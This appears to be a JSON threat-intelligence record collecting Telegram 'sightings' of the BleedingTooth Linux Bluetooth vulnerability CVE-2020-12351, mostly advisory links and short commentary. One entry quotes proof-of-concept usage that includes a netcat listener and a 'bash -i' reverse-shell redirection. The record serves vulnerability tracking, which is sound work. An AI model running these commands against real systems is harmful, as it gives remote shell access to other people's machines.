{"vulnerability": "CVE-2020-12351", "sightings": [{"uuid": "77f25b6e-6ba9-48c0-ba91-0e7dbebc0d80", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-12351", "type": "seen", "source": "MISP/dacd13f2-d0f5-4acd-8609-392011902770", "content": "", "creation_timestamp": "2024-11-14T06:08:51.000000Z"}, {"uuid": "85ea022f-bcac-4d07-b61e-99d502401050", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-12351", "type": "seen", "source": "https://t.me/novitoll_ch/107", "content": "\u0439\u0435\u043f, \u0441\u0435\u0433\u043e\u0434\u043d\u044f \u0434\u0443\u043c\u0430\u044e, \u0431\u0443\u0434\u0435\u043c \u0441\u0442\u0440\u0438\u043c\u0430\u0442\u044c \u0434\u0430\u043b\u044c\u0448\u0435. CVE-2020-12351", "creation_timestamp": "2020-10-20T11:06:43.000000Z"}, {"uuid": "85eecf62-83a5-40f1-ac1c-372e9dca5a6a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-12351", "type": "seen", "source": "https://t.me/novitoll_ch/105", "content": "https://youtu.be/iEByzdTp-44\n\n\u0420\u0430\u0437\u043e\u0431\u0440\u0430\u043b CVE-2020-12352 (stack leak \u0432 struct a2mp_info_rsp),  CVE-2020-12351 (heap-based type confusion \u0432  sk_filter(struct amp_mgr data)),  \u0438 \u043f\u0440\u043e\u0432\u0435\u0440\u0438\u043b, \u0447\u0442\u043e \u0443 \u043c\u0435\u043d\u044f \u0441 Bluetooth 4.1  \u043d\u0435 \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 CVE-2020-24490, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0432\u0430\u043b\u0438\u0434\u0435\u043d  \u0442\u043e\u043b\u044c\u043a\u043e \u0434\u043b\u044f Bluetooth 5 chip + \u0432 \u0440\u0435\u0436\u0438\u043c\u0435 \u0441\u043b\u0443\u0448\u0430\u043d\u0438\u044f. \n\n\u041d\u0430 \u0441\u043b\u0435\u0434 \u0440\u0430\u0437 \u043f\u043e\u0434\u0433\u043e\u0442\u043e\u0432\u043b\u044e Ubuntu 20.04 + KASAN, \u043f\u043e\u0442\u043e\u043c\u0443 \u0447\u0442\u043e \u0442\u0435\u043a\u0443\u0449\u0438\u0439 \u043d\u0435 \u0437\u0430\u0432\u0435\u043b\u0441\u044f \u043f\u043e\u0447\u0435\u043c\u0443-\u0442\u043e, \u043c\u0431 BusyBox \u0434\u0430\u0436\u0435 \u043b\u0443\u0447\u0448\u0435 \u0431\u0443\u0434\u0435\u0442.  \u0418 \u0435\u0449\u0435 \u0431\u044b \u0441\u0442\u0430\u0442\u044c\u044e \u043d\u0430\u043f\u0438\u0441\u0430\u0442\u044c \u0447\u0442\u043e \u043b\u0438 \u0434\u043b\u044f \u0430\u043d\u0433\u043b\u043e\u043f\u0443\u0431\u043b\u0438\u043a\u0438. Stay tuned ^_^", "creation_timestamp": "2020-10-17T21:21:58.000000Z"}, {"uuid": "b1e26b95-0619-4b77-ac36-09ba8aa45fa0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-12351", "type": "seen", "source": "https://t.me/pwnwiki_zhchannel/102", "content": "CVE-2020-12352&amp;CVE-2020-12351 Linux Kernel 5.4 BleedingTooth\u9060\u7a0b\u4ee3\u78bc\u57f7\u884c\u6f0f\u6d1e\nhttps://short.pwnwiki.org/?c=U8IwVQ", "creation_timestamp": "2021-09-21T06:42:51.000000Z"}, {"uuid": "1ce87d9f-2dbc-46c8-b8e9-d6de6e15bb83", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-12351", "type": "published-proof-of-concept", "source": "https://t.me/novitoll_ch/101", "content": "BleedingTooth. \u0437\u0430\u0432\u0442\u0440\u0430 \u0432 \u043c\u043e\u0435\u043c \u0447\u0430\u0442\u0435 (@binexp) \u043f\u043e\u0433\u043e\u0432\u043e\u0440\u0438\u043c \u043f\u0440\u043e CVE-2020-12351, CVE-2020-12352.   \u041f\u043e\u043f\u0440\u043e\u0431\u0443\u0435\u043c \u0440\u0430\u0437\u043e\u0431\u0440\u0430\u0442\u044c\u0441\u044f \u043f\u043e \u043a\u0440\u0443\u043f\u0438\u043d\u043a\u0435 \u0447\u0442\u043e \u043f\u0440\u043e\u0438\u0437\u043e\u0448\u043b\u043e, \u0435\u0441\u0442\u044c \u0442\u043e\u043b\u044c\u043a\u043e PoC, \u043f\u043e\u043f\u0440\u043e\u0431\u0443\u0435\u043c \u0440\u0430\u0437\u043e\u0431\u0440\u0430\u0442\u044c \u0435\u0433\u043e. \u042d\u0442\u043e\u0442 1-day  2-3 \u0434\u043d\u044f \u043d\u0430\u0437\u0430\u0434 Google p0 \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b (Andy Ngyuen). \u0421\u0432\u0435\u0436\u0430\u0447\u043e\u043a. \u041c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u043d\u0438\u0447\u0435\u0433\u043e \u0438 \u043d\u0435 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u0441\u044f, \u043d\u043e \u043f\u043e\u043f\u0440\u043e\u0431\u0443\u0435\u043c", "creation_timestamp": "2020-10-16T13:11:28.000000Z"}, {"uuid": "4e5dc24f-26ce-44e9-9990-e063c8b76952", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-12351", "type": "published-proof-of-concept", "source": "https://t.me/indoghostsec/4628", "content": "BleedingTooth: Linux Bluetooth Zero-Click Remote Code Execution\nt.me/indoghostsec\n\nThis Proof-Of-Concept demonstrates the exploitation of CVE-2020-12351 and CVE-2020-12352.\n\nUsage:\n\n$ gcc -o exploit exploit.c -lbluetooth\nand execute it as:\n\n$ sudo ./exploit target_mac source_ip source_port\nIn another terminal, run:\n\n$ nc -lvp 1337\nexec bash -i 2&gt;&amp;0 1&gt;&amp;0\nIf successful, a calc can be spawned with:\n\nexport XAUTHORITY=/run/user/1000/gdm/Xauthority\nexport DISPLAY=:0\ngnome-calculator\nThis Proof-Of-Concept has been tested against a Dell XPS 15 running Ubuntu 20.04.1 LTS with:\n\n5.4.0-48-generic #52-Ubuntu SMP Thu Sep 10 10:58:49 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux\nThe success rate of the exploit is estimated at 80%.", "creation_timestamp": "2021-04-07T17:47:27.000000Z"}, {"uuid": "e0b20ecf-9289-4c76-b804-26ced680d347", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-12351", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/1918", "content": "#WLAN_Security\nBleedingTooth:\nVulnerabilities in Linux Bluetooth Allow 0-Click Attacks:\n1. CVE-2020-12351.\nHeap-Based Type Confusion in L2CAP:\nhttps://github.com/google/security-research/security/advisories/GHSA-h637-c88j-47wq\n2. CVE-2020-12352.\nBadChoice - Stack-Based Infoleak in A2MP:\nhttps://github.com/google/security-research/security/advisories/GHSA-7mh3-gq28-gfrq\n3. CVE-2020-24490.\nHeap-Based Buffer Overflow in HCI event packet parser:\nhttps://github.com/google/security-research/security/advisories/GHSA-ccx2-w2r4-x649", "creation_timestamp": "2024-07-19T19:59:44.000000Z"}, {"uuid": "16924b33-f482-44d7-bfa6-c5d52aba9891", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-12351", "type": "seen", "source": "https://t.me/SecLabNews/9073", "content": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u043c \u0441\u0442\u0435\u043a\u0435 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u043e\u0432 Bluetooth \u0432 \u044f\u0434\u0440\u0435 Linux (CVE-2020-12351, CVE-2020-12352 \u0438 CVE-2020-24490), \u043f\u043e\u043b\u0443\u0447\u0438\u0432\u0448\u0438\u0435 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 BleedingTooth, \u043c\u043e\u0433\u0443\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u044b \u0434\u043b\u044f \u0437\u0430\u043f\u0443\u0441\u043a\u0430 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430 \u0438\u043b\u0438 \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u043a\u043e\u043d\u0444\u0438\u0434\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438.     \n\ufeff\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u0441\u0442\u0435\u043a\u0435 Bluetooth \u0434\u043b\u044f Linux \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0442 \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043b\u044f\u0442\u044c \u0430\u0442\u0430\u043a\u0438 zero-click", "creation_timestamp": "2020-10-15T10:10:02.000000Z"}, {"uuid": "c60b9f8a-43a2-4d27-a788-f2250c430a93", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-12351", "type": "seen", "source": "https://t.me/cibsecurity/16718", "content": "\u203c CVE-2020-12351 \u203c\n\nImproper input validation in BlueZ may allow an unauthenticated user to potentially enable escalation of privilege via adjacent access.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2020-11-23T20:46:02.000000Z"}, {"uuid": "63a48a41-353a-4619-a87a-660381f583a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-12351", "type": "seen", "source": "https://t.me/cibsecurity/15919", "content": "\u203c CVE-2020-25661 \u203c\n\nA Red Hat only CVE-2020-12351 regression issue was found in the way the Linux kernel's Bluetooth implementation handled L2CAP packets with A2MP CID. This flaw allows a remote attacker in an adjacent range to crash the system, causing a denial of service or potentially executing arbitrary code on the system by sending a specially crafted L2CAP packet. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2020-11-06T00:50:03.000000Z"}]}